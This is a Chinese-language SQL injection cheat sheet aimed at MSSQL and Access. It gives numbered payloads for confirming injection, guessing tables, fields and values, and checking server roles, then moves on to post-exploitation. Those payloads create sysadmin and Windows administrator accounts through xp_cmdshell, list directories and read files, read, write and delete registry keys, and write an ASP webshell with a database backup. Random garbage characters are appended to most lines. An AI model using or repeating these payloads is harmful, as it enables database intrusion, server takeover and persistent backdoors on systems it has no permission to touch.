1.判断是否有注入;and 1=1 ;and 1=2 av�|r^zc�
2.初步判断是否是mssql ;and user>0 8NU��<l�V`
`P/�7�M��f
3.注入参数是字符'and [查询条件] and ''=' 36MqEUj�yB
^U1�@
hq*u
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �!Q(x�A,�p
X�L
SYE
��
5.判断数据库系统 }e[;~�g\�&
��'��VVEd[
;and (select count(*) from sysobjects)>0 mssql �e�\o>(is�
� M1�8<d1*
;and (select count(*) from msysobjects)>0 access l@:|O�GD;8
�J4Yu|E<&�
abA�X)R�'�
F<R�+]M:fa
6.猜数据库 ;and (select Count(*) from [数据库名])>0 �)�o4B^kq
M�`m��-@z�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 R1A|�g�=kF
d#l� z^Ls2
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 V�AGQR&T�?
F`C$�F!G�E
9.(1)猜字段的ascii值(access) \Z~|ry0v{d
M^C�|�svm
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 k�F,_o�/Jc
]!��%
p21e
(2)猜字段的ascii值(mssql) V@%�:y tDf
8Qm%T7]UFb
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 kx3?'=0;5�
4�n}tDHv�d
10.测试权限结构(mssql) ��/^C���kk
qh��E1
7Hf
w�gETL|3-�
#Cy9��E"lP
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ^��/`W0kT�
co�G_�bX?e
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- ;^yR,32�F�
E$8���D^Zt
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- �h�v4om��+
JJE���3�\
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- %]U'��� �
>�)�+���-:
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- P��jvzefp
z�+~klv��3
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- Of@�LEEh6�
qG&}l�g?g{
;and 1=(select IS_MEMBER('db_owner'));-- [p:mja.6�y
655OL)|cD6
BSyl!>G6n8
A
,$CYLj+�
11.添加mssql和系统的帐户 1��Uy�'TEk
D# ��Gf.�c
;exec master.dbo.sp_addlogin username;-- He1hg��J)N
;exec master.dbo.sp_password null,username,password;-- Lo{g0~?�x*
,SZ�Y�Z 25
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- Vs"�1:gi&
9$~a&�lXO5
;exec master.dbo.xp_cmdshell 'net user username password �^J]_O_ee$
1+Z�@4�;fk
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �kWZ@v+Mk3
8�mh@�C6U�
;exec master.dbo.xp_cmdshell 'net user username password /add';-- 2�d60o~��E
��B3';�Tcs
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- !y�Q�%�^g`
m|�by^40A(
�.{8?eze[m
y$R�h�$e�K
12.(1)遍历目录 bd�$``(b`v
hN"cXz"�/�
;create table dirs(paths varchar(100), id int) ZR��[6-���
H�'_���v��
;insert dirs exec master.dbo.xp_dirtree 'c:\' N~)RR {$w�
+N�>�z|T<
;and (select top 1 paths from dirs)>0 "?n;dXYSi
|�!?lwBs4�
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) n~mP7X%wE7
�O,�_k�.EH
;�4��s7\9o
�V�/�@7XAt
(2)遍历目录 }�Nc Ed��;
'��]__V[
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- t�wr�-+rm2
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 a�)qlrtCl�
p�\G1O*Z
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 m�JYG k_ua
M/5�+As�T�
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 ���%�s),4
N��x�GSs_7
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ��87p�tab@
�DPM4v7� S
PZYVLUw
`
3�[cGSI"+
13.mssql中的存储过程 �#J`M�R0�5
�~�RU-N%Kn
xp_regenumvalues 注册表根键, 子键 VC.zmCglo^
�^$�x1~�}D
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 �mFx��\[�S
�8�}.V[,]6
xp_regread 根键,子键,键值名 �,1e\��}�^
dUc�(��[�&
;exec xp_regread �Fu\!�'\�6
|FP@�NUX�\
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 go!jx6~�;x
��<6�S�T�w
xp_regwrite 根键,子键, 值名, 值类型, 值 \}EJtux q�
"Gc\��"'^r
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ]w�HXrB8vx
o�!�Y61S(�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 m2>$)�\-;�
<gLq�?~e|A
xp_regdeletevalue 根键,子键,值名 �myqQq�VW�
��$�l/w�.z
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 %j.
*YvveW
d8N4@3�CkL
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 � BRF4��p:
()ZP��=\�L
0k��xe5*-|
N+C�c�Ws!E
14.mssql的backup创建webshell �8u��mW>�
"YoFUfa�Ng
use model byN4��?3�F
+BgUnu�26
create table cmd(str image); +Cs�.v.GA5
*f
k3IvAXu
insert into cmd(str) values (''); &2//�\Qz�
dz,4�)�;Mg
backup database model to disk='c:\l.asp'; ueu�=$.^;g
�U*cWNn:."
jVInTR0f[�
��?,�oE_H�
15.mssql内置函数 @tVl8��]y
PD`�EtkUnv
;and (select @@version)>0 获得Windows的版本号 :IRQouTf:,
�<ql�:n���
;and user_name()='dbo' 判断当前系统的连接用户是不是sa k!ac_}&NNv
�RWdx)�qj{
;and (select user_name())>0 爆当前系统的连接用户 m���=qyP�Y
P�o7o�o�9d
;and (select db_name())>0 得到当前连接的数据库 6(-c$d`C.0
C �sx�
EN4
,.��TwM;w=
I�g�b%bO_
16.简洁的webshell Bs';!�,��=
Dfw��%�B�u
use model u�E�^5o\To
��o0�#zk�
create table cmd(str image); v���g-'MG�
�oG'
'my#3
insert into cmd(str) values (''); �=�aCd,4B}
R~N'5#.�*M
backup database model to disk='g:\wwwtest\l.asp';
